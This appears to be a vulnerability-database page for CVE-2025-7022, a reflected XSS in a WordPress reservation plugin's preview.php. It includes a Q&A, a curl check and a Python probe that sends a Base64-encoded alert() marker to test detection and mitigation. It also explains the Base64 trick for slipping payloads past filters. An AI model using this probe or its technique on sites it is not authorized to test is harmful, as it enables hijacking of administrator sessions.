CVE-2025-7022
BaseFortify
Publication date: 2025-07-25
Last updated on: 2025-07-25
Assigner: WPScan
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| my_reservation_system | my_reservation_system | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-UNKNOWN | |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7022 is a reflected Cross-Site Scripting (XSS) vulnerability in the WordPress plugin "My Reservation System", affecting versions up to 2.3. The plugin's preview.php script reads a parameter called 'val', Base64-decodes it and writes the decoded value into the page without validating or escaping it. Because the input travels Base64-encoded, a payload such as a script tag passes through the URL with no literal angle brackets, which hides it from filters that look for raw HTML in the query string, and the browser executes the decoded markup when the page renders. An attacker who gets a victim, such as a logged-in administrator, to open a crafted URL can therefore run arbitrary JavaScript in that user's browser, leading to unauthorized actions or data theft. [1]
How can this vulnerability impact me?
If the plugin is installed on your site, an attacker can execute arbitrary JavaScript in the browser of any user who opens a crafted link, and the damage scales with that user's privileges. In an administrator's session the script can perform any action the admin could and read any data the admin can see. Stealing the login cookie itself is less straightforward than the phrase "session hijacking" suggests, because WordPress marks its authentication cookies HttpOnly, but the script does not need the cookie: it can issue authenticated requests directly from the victim's browser. Because the attack is reflected, it only succeeds when the victim visits the crafted URL, so phishing or a planted link is the usual delivery vector, and a single click by an administrator can compromise control of the site. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Test the 'val' parameter of the plugin's preview.php script for reflected Cross-Site Scripting (XSS). Build a URL whose 'val' value is the Base64 encoding of a harmless marker payload and request it with curl or wget. A command-line client does not run JavaScript, so the check is whether the decoded payload comes back unescaped in the response body. For example: curl -i 'http://your-site.com/wp-content/plugins/my-reservation-system/preview.php?val=PHNjcmlwdD5hbGVydCgndGVzdG40Jyk8L3NjcmlwdD4=' (the Base64 value decodes to <script>alert('testn4')</script>). If the response contains that string verbatim, rather than an HTML-escaped form such as &lt;script&gt;, the vulnerability is present; confirming in a browser that the alert fires settles any doubt. On the defensive side, confirm whether the plugin is installed at all, and review web server access logs for requests to preview.php that carry a 'val' parameter, which is how exploitation attempts would appear. [1]
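The following is an added example, not code from BaseFortify, WPScan or the plugin author. It turns the curl check above into a small Python probe: it builds the URL from the plugin path and 'val' parameter quoted in the Q&A (the host is a placeholder), uses the same alert('testn4') payload, and classifies the response as vulnerable (payload echoed verbatim), escaped (tag echoed as &lt;script&gt;, which is what a fixed plugin should produce) or not reflected. The two sample response bodies are constructed here so the classifier can be exercised offline; the fetch function is only used when the script is run against a real host, and only sites you are authorized to test should be probed.

```python
"""Probe a WordPress site for the reflected XSS in preview.php's 'val'.

Added example, not the plugin's or BaseFortify's code. Assumes the path
/wp-content/plugins/my-reservation-system/preview.php and the 'val'
parameter named in the Q&A above; the target host is a placeholder.
"""
import base64
import html
import sys
import urllib.parse
import urllib.request

PREVIEW_PATH = "/wp-content/plugins/my-reservation-system/preview.php"
# Same payload the curl example in the Q&A decodes to. A harmless marker
# is enough: we only need to see whether it is echoed back unescaped.
PAYLOAD = "<script>alert('testn4')</script>"

# Constructed sample responses for offline testing (not captured traffic).
VULNERABLE_BODY = (
    '<html><body><div class="preview">' + PAYLOAD + "</div></body></html>"
)
FIXED_BODY = (
    '<html><body><div class="preview">'
    "&lt;script&gt;alert(&#039;testn4&#039;)&lt;/script&gt;"
    "</div></body></html>"
)


def encode_val(payload: str) -> str:
    """Base64-encode the payload the way the 'val' parameter expects it."""
    return base64.b64encode(payload.encode()).decode("ascii")


def probe_url(site: str, payload: str = PAYLOAD) -> str:
    """Build the probe URL for a site such as https://example.com.

    urlencode() percent-encodes the Base64 padding and any '+' or '/',
    so the server decodes exactly the bytes we intended.
    """
    query = urllib.parse.urlencode({"val": encode_val(payload)})
    return site.rstrip("/") + PREVIEW_PATH + "?" + query


def classify(body: str, payload: str = PAYLOAD) -> str:
    """Classify a response body.

    'vulnerable'    : decoded payload echoed verbatim, so a browser runs it.
    'escaped'       : the script tag came back HTML-escaped (fixed behaviour).
    'not-reflected' : nothing recognisable came back.
    """
    if payload in body:
        return "vulnerable"
    # Match on the escaped tag only, so &#039; vs &#x27; quoting of the
    # inner string does not matter.
    if html.escape("<script>", quote=False) in body:
        return "escaped"
    return "not-reflected"


def fetch(url: str, timeout: float = 10.0) -> str:
    """Fetch a URL and return the body as text (network access)."""
    req = urllib.request.Request(url, headers={"User-Agent": "xss-probe"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


def scan(site: str, fetch_fn=fetch) -> tuple:
    """Probe one site and return (url, verdict). fetch_fn is injectable
    so the logic can be tested without a network."""
    url = probe_url(site)
    return url, classify(fetch_fn(url))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "https://your-site.example"
    url, verdict = scan(target)
    print(url)
    print(verdict)
```

Run it as `python probe.py https://your-site.example`. A "vulnerable" verdict means the decoded payload was echoed verbatim; an "escaped" verdict is what you should see once the plugin escapes its output, and "not-reflected" usually means the plugin is not installed at that path or the script ignores the parameter.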
What immediate steps should I take to mitigate this vulnerability?
Because no fixed version is currently known, the most reliable mitigation is to deactivate or remove the My Reservation System plugin until a patch is released. If the plugin must stay active, restrict access to the vulnerable preview.php script, for example by denying direct requests to it at the web server or by adding a web application firewall (WAF) rule that blocks requests to that path whose 'val' parameter decodes to HTML markup; be aware that this may break the plugin's preview feature. Warn administrators and other privileged users not to open unsolicited links to the site, particularly ones carrying a long Base64-looking 'val' parameter, and monitor access logs for such requests. [1]